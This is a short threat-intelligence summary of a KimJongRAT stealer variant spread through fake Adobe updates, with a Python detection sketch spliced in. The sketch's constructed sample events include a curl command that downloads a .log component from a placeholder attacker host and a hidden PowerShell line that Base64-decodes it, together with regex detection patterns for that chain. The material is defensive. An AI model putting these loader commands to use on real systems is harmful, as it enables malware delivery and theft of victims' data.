Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation
Summary
Threat actors have deployed a multi-stage Windows malware loader and information-stealing agent called KimJongRAT, targeting individuals in South Korea with fake Adobe software updates.
Once executed, the malware retrieves additional components from attacker-controlled servers using the curl command-line tool that ships with Windows.
It then decrypts and loads these components using a custom loader written in PowerShell.
The malware has two main components, a downloader and a stealer, which are loaded and executed from files 2.log and 1.log, respectively.
The keylogger and stealer modules are stored as Base64-encoded text in a separate file (1.log), which the downloader script reads and decodes.
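The loader chain described above (curl fetching components from a remote server into .log files, then a PowerShell script reading and Base64-decoding them) is observable in process-creation telemetry. The following is an added detection sketch, not code from the original report: it runs two heuristic checks over constructed sample events and correlates them per host within a short time window. The event format, the placeholder server name, the regular expressions and the ten-minute window are all assumptions made for this example.

```python
"""Detection sketch for a curl-to-.log download followed by PowerShell Base64 decoding.

Constructed sample telemetry (not real events). One process-creation event per
line, '|'-separated:  <ISO timestamp>|<host>|<image path>|<command line>
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Constructed events: the first two model the loader chain on host WS01
# (server name is a placeholder); the last two are benign lookalikes on WS02.
SAMPLE_EVENTS = r"""
2024-01-01T09:00:01|WS01|C:\Windows\System32\curl.exe|curl.exe -s http://c2-placeholder.invalid/2.log -o C:\Users\u\AppData\Local\Temp\2.log
2024-01-01T09:00:04|WS01|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "$b=[Convert]::FromBase64String((Get-Content $env:TEMP\1.log) -join '')"
2024-01-01T09:05:00|WS02|C:\Windows\System32\curl.exe|curl.exe -s https://example.org/file.txt -o C:\Temp\file.txt
2024-01-01T10:00:00|WS02|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "Get-Content C:\Temp\app.log"
"""


@dataclass
class ProcEvent:
    ts: datetime
    host: str
    image: str
    cmdline: str


def parse_events(text: str) -> list[ProcEvent]:
    """Parse the '|'-separated sample format; the command line may itself contain '|' only if it is last."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(datetime.fromisoformat(ts), host, image, cmdline))
    return events


# Heuristics (assumed patterns, tune for your environment):
_URL = re.compile(r"https?://\S+", re.IGNORECASE)
# curl writing its download to a file whose extension is .log
_OUT_LOG = re.compile(r'(?:^|\s)(?:-o|--output)\s+"?([^\s"]+\.log)\b', re.IGNORECASE)
# any path-like token ending in .log referenced on a PowerShell command line
_LOG_REF = re.compile(r"[\w$:\\.~-]+\.log\b", re.IGNORECASE)
# explicit Base64 decoding of file contents
_B64 = re.compile(r"FromBase64String", re.IGNORECASE)


def is_curl_download_to_log(ev: ProcEvent) -> bool:
    """curl.exe fetching a URL and saving it under a .log name."""
    return (
        PureWindowsPath(ev.image).name.lower() == "curl.exe"
        and _URL.search(ev.cmdline) is not None
        and _OUT_LOG.search(ev.cmdline) is not None
    )


def is_powershell_decoding_log(ev: ProcEvent) -> bool:
    """powershell.exe/pwsh.exe referencing a .log file and decoding Base64 content."""
    name = PureWindowsPath(ev.image).name.lower()
    return (
        name in ("powershell.exe", "pwsh.exe")
        and _LOG_REF.search(ev.cmdline) is not None
        and _B64.search(ev.cmdline) is not None
    )


def correlate(events: list[ProcEvent], window: timedelta = timedelta(minutes=10)) -> list[tuple[str, str, str]]:
    """Pair each suspicious curl download with a later PowerShell decode on the same host.

    Returns (host, download_ts, decode_ts) tuples; the window is an assumption.
    """
    downloads = [e for e in events if is_curl_download_to_log(e)]
    decodes = [e for e in events if is_powershell_decoding_log(e)]
    alerts = []
    for d in downloads:
        for p in decodes:
            if p.host == d.host and timedelta(0) <= p.ts - d.ts <= window:
                alerts.append((d.host, d.ts.isoformat(), p.ts.isoformat()))
    return alerts


if __name__ == "__main__":
    for host, dl, dec in correlate(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT {host}: curl download to .log at {dl}, PowerShell Base64 decode at {dec}")
```

Either check alone is noisy (curl and Get-Content on .log files are both legitimate); the correlation across the two stages on one host is what makes the chain worth alerting on. In a real deployment the same logic would run over Sysmon event ID 1 or Windows Security 4688 command-line fields rather than the constructed lines here.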
These modules collect and upload system information and browser data to the attacker’s server.
The attackers likely use this information to stage follow-on attacks against the victim's colleagues and friends.
This malware also includes a user-mode/kernel-mode driver component, which means it requests elevated privileges during execution.
We recommend users refrain from opening unsolicited Adobe software update alerts and verify them against legitimate Adobe websites.